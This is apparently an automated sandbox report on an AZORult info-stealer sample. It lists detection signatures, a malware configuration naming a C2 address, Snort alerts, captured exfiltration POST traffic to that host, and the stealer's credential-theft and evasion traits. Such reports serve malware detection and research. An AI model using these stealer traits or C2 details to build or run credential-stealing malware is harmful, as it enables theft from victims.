Analysis Report gunzipped.exe

Overview

General Information

Sample Name: gunzipped.exe
Analysis ID: 396371
MD5: 289691163ea5795a930703689eb1b3b9
SHA1: 46dc959dc6848a44d6930d00ad2a9e60db08e47b
SHA256: ba5786cfe255f158264fabd0b0cbf90b6f96ddd230a5fe82ca0c551d420f95be
Tags: AZORult, exe

Detection

AZORult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected AZORult Info Stealer
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Azorult
Yara detected Azorult Info Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Binary contains a suspicious time stamp
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • gunzipped.exe (PID: 5624 cmdline: 'C:\Users\user\Desktop\gunzipped.exe' MD5: 289691163EA5795A930703689EB1B3B9)
    • gunzipped.exe (PID: 5472 cmdline: {path} MD5: 289691163EA5795A930703689EB1B3B9)
  • cleanup

Malware Configuration

Threatname: Azorult

{"config: ": ["MachineID :", "EXE_PATH  :", "Screen:", "Layouts:", "LocalTime:", "Computer(Username) :", "Zone:", "[Soft]", "Host: 31.210.20.121\r"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000003.283731822.0000000003C38000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000003.00000003.279779219.00000000033C4000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
(5 of 11 entries shown)

Unpacked PEs

Source | Rule | Description | Author
3.2.gunzipped.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
3.2.gunzipped.exe.400000.0.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
3.2.gunzipped.exe.400000.0.unpack | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
  • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
3.2.gunzipped.exe.400000.0.raw.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
3.2.gunzipped.exe.400000.0.raw.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
(5 of 7 entries shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: gunzipped.exe.5472.3.memstr | Malware Configuration Extractor: Azorult {"config: ": ["MachineID :", "EXE_PATH :", "Screen:", "Layouts:", "LocalTime:", "Computer(Username) :", "Zone:", "[Soft]", "Host: 31.210.20.121\r"]}
Multi AV Scanner detection for domain / URL
Source: http://31.210.20.121/index.php | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: gunzipped.exe | Virustotal: Detection: 55%
Source: gunzipped.exe | ReversingLabs: Detection: 75%
Machine Learning detection for sample
Source: gunzipped.exe | Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0040A610 CryptUnprotectData,LocalFree,3_2_0040A610
Source: gunzipped.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\gunzipped.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: gunzipped.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_004099C0 FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,3_2_004099C0
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0040A9E4 FindFirstFileW,FindNextFileW,FindClose,3_2_0040A9E4
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0040D988 FindFirstFileW,FindFirstFileW,3_2_0040D988
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00409EF0 FindFirstFileW,GetFileAttributesW,3_2_00409EF0
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00413030 FindFirstFileW,FindNextFileW,FindClose,3_2_00413030
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0040A9E3 FindFirstFileW,FindNextFileW,FindClose,3_2_0040A9E3
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,3_2_004119A8
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_004119AC FindFirstFileW,FindNextFileW,FindClose,3_2_004119AC
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0040DB00 FindFirstFileW,3_2_0040DB00
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0040DB30 FindFirstFileW,3_2_0040DB30
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,3_2_00412D6C
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_0041160C FindFirstFileW,FindNextFileW,FindClose,3_2_0041160C
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,3_2_00413F58
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00409EE8 FindFirstFileW,GetFileAttributesW,3_2_00409EE8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.5:49703 -> 31.210.20.121:80
Source: Traffic | Snort IDS: 2029140 ET TROJAN AZORult v3.2 Server Response M2 31.210.20.121:80 -> 192.168.2.5:49703
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: Host: 31.210.20.121
Source: Joe Sandbox View | ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: global traffic | HTTP traffic detected:
  POST /index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: 31.210.20.121
  Content-Length: 105
  Cache-Control: no-cache
  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 fd 28 39 fe 28 39 fe 4b 2f fb 3d 4c ed 3f 4e 8a 48 2f fb 38 2f fb 3a 4e ed 3e 3a ed 3e 3e ed 3e 3c ed 3f 4e 8a 28 39 fd 28 39 fc 49 2f fb 3a 48 ed 3e 32 ed 3e 3b 8e
  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NH/8/:N>:>>><?N(9(9I/:H>2>;
Source: global traffic | HTTP traffic detected:
  POST /index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: 31.210.20.121
  Content-Length: 11117
  Cache-Control: no-cache
Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,3_2_00417D84
Source: gunzipped.exe, 00000003.00000003.283704458.00000000026B0000.00000004.00000001.sdmp, gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmp | String found in binary or memory: http://31.210.20.121/index.php
Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmp | String found in binary or memory: http://31.210.20.121/index.phpU)
Source: gunzipped.exe | String found in binary or memory: http://ip-api.com/json
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/A
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
                    Source: mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://www.mozilla.com0
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/Jhttps://login.live.com/login.srf.c
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.c_
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/Zhttps://contextual.media.net/medianet.phpZhttps://contextual.media.net/med
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: gunzipped.exe, 00000001.00000003.238889129.0000000005691000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
                    Source: gunzipped.exe, 00000001.00000003.239065899.0000000005694000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comes
                    Source: gunzipped.exe, 00000001.00000003.238889129.0000000005691000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comn-u
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: gunzipped.exe, 00000001.00000003.240102819.0000000005679000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: gunzipped.exe, 00000001.00000003.240102819.0000000005679000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krend
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: gunzipped.exe, 00000001.00000003.239257578.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com(Yk
                    Source: gunzipped.exe, 00000001.00000003.239302434.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic:Ye
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmp, gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmp, gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.p
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phpd=
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
                    Source: gunzipped.exeString found in binary or memory: https://dotbit.me/a/
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authoriz
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome//J
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/Fs
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngS8
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngt
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmp, gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0#
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0)
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0p
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlK

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: 00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult Payload Author: kevoreilly
                    Source: 3.2.gunzipped.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
                    Source: 3.2.gunzipped.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
                    Source: 3.3.gunzipped.exe.39186c4.155.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 3.3.gunzipped.exe.393a6b1.154.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 3.3.gunzipped.exe.39a5e02.153.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: String function: 00403BF4 appears 46 times
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: String function: 004062FC appears 42 times
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: String function: 00404E98 appears 86 times
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: String function: 00404EC0 appears 33 times
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: String function: 0040300C appears 32 times
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: String function: 004034E4 appears 33 times
                    Source: api-ms-win-core-debug-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
                    Source: gunzipped.exe, 00000001.00000002.253408009.0000000000CF0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAuz vs gunzipped.exe
                    Source: gunzipped.exe, 00000001.00000002.262457843.0000000007360000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs gunzipped.exe
                    Source: gunzipped.exe, 00000001.00000002.263060483.0000000007680000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs gunzipped.exe
                    Source: gunzipped.exe, 00000001.00000002.257237268.0000000005810000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSmartFormat.dll8 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameapisetstubj% vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.274190761.00000000026B4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dll^ vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenssdbm3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesoftokn3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefreebl3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000002.284083374.0000000000550000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAuz vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000002.284666439.0000000002670000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs gunzipped.exe
                    Source: gunzipped.exe | Binary or memory string: OriginalFilenameAuz vs gunzipped.exe
                    Source: gunzipped.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 3.2.gunzipped.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 3.2.gunzipped.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 3.3.gunzipped.exe.39186c4.155.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 3.3.gunzipped.exe.393a6b1.154.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 3.3.gunzipped.exe.39a5e02.153.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: gunzipped.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@3/50@0/1
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00416290 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,GetCurrentProcessId
                    Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\gunzipped.exe.log
                    Source: C:\Users\user\Desktop\gunzipped.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A7566F0F-BE57D046-B54D7B81F
                    Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Local\Temp\2fda\
                    Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL id FROM %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
